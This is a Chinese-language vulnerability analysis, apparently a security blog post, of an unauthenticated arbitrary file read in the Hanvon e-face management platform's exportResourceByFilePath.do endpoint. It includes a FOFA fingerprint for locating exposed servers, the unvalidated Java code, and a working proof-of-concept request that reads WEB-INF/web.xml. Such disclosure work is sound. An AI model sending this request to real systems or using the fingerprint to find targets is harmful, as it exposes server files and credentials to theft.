漏洞简介
汉王e脸通综合管理平台 exportResourceByFilePath.do 接口存在任意文件读取漏洞。攻击者可在无需认证的情况下,通过构造恶意请求访问 exportResourceByFilePath.do 接口,传入任意文件路径参数,实现服务器上任意文件的读取,影响系统敏感数据的泄露和信息安全。
影响版本
v1.6.x
fofa语法
icon_hash="1380907357"
漏洞分析
直接看 LeaveListController 下的 exportResourceByFilePath.do 实现方式
@ResponseBody
@RequestMapping(
value = {"exportResourceByFilePath.do"},
method = {RequestMethod.GET}
)
public void exportResourceByFilePath(@RequestParam(required = false,value = "filePath") String filePath, HttpServletResponse response) throws Exception {
try {
String path = TheApp.getRootPath("");
String photoPath = path + filePath;
File file = new File(photoPath);
if (file.exists()) {
InputStream inStream = new FileInputStream(photoPath);
response.reset();
response.setContentType("bin");
response.addHeader("Content-Disposition", "attachment;filename=\"" + new String(filePath.getBytes("utf-8"), "ISO8859-1") + "\"");
byte[] b = new byte[100];
int len;
while((len = inStream.read(b)) > 0) {
response.getOutputStream().write(b, 0, len);
}
inStream.close();
}
} catch (IOException e) {
e.printStackTrace();
}
}
对用户可控参数 filePath 无任何过滤或校验,直接拼接路径返回文件路径进行文件操作,也是朴实无华的任意文件读取漏洞。
漏洞复现
GET /manage/leaveList/exportResourceByFilePath.do?recoToken=67mds2pxXQb&filePath=WEB-INF/web.xml HTTP/1.1
Host: hanvon.mrxn.net

成功读取到 web.xml 文件


